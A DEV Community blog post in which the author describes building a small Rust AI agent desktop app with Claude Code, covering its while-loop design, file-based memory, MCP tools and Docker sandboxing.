DEV Community

Yuhao Xu
Yuhao Xu

Posted on

I Built an Open-Source Cowork in 24 Hours with ZERO Rust Experience — and the Agent Builts Itself

#claude #opensource #ai #rust

I walked into this with exactly zero Rust experience and a stubborn belief: building an agent shouldn’t require a megachurch of frameworks. Twenty-four hours later, I shipped a Rust-native AI Agent desktop for non-dev that compiled to a 16MB tiny binary, a simple while loop with Skills, MCPs supported. And the most important part: BYOK (Bring Your Own Key) and even local models!

Call it technical minimalism.

The Stack

  • Rust (from zero to shipping in one day)
  • Long term memory: File system as persistent, queryable context
  • Loop: A single while loop coordinating I/O and tool calls
  • Tools: Built-in file tools (read, write, bash) + MCP-compliant providers (extensible)
  • Sandboxing: A simple docker container would isolation most risks.

Secret Sauce

  • Keep state in plain files and directories.
  • Keep orchestration in a simple loop, not a framework
  • Teach the AI to read and write its own operating context, in files.

What I learnt:
1) You don’t need an agent framework
Agent “framework” is almost always over abstraction and adds complexity.

  • Just a simple while loop:
    1. Observe: read inputs, logs, and task files
    2. Decide: ask the model for the next atomic action
    3. Act: call a tool (MCP) or write to disk
    4. Reflect: append outcomes to a local journal

2) The File System is all you need
Vector stores and RAG farms are great—until they become speculative overhead.

  • Everything as Files: Tasks, plans, diffs, decisions, and logs live as plain text and JSON.
  • Modern RL training methods have trained models to work super well with Linux files systems.
  • Using the FS as the “long term momery” makes persistence trivial and recoverability obvious.

3) The Surreal Mirror: AI Coding reproduces itself.
Of course, I use an AI agent (Claude Code) to work for me.
The Open Cowork is basically a GUI with a CC-like agent behind it. It’s super interesting to see CC can reproduce itself in Rust.

4) Security as a First-Class Citizen
Agents are powerful, but power without boundaries is a liability. They are potentially vulnerable to bad actors and prompt injection risks or even bugs. For non-devs, security isn’t just a feature—it’s the foundation.
By implementing hard sandboxing (like Docker) and strictly whitelisting system commands or network calls, we ensure the agent remains a helpful tool, not a system threat.

The entire codebase can be summarized in the loop below:


Of course it's still early, any feedback is welcome!

Top comments (0)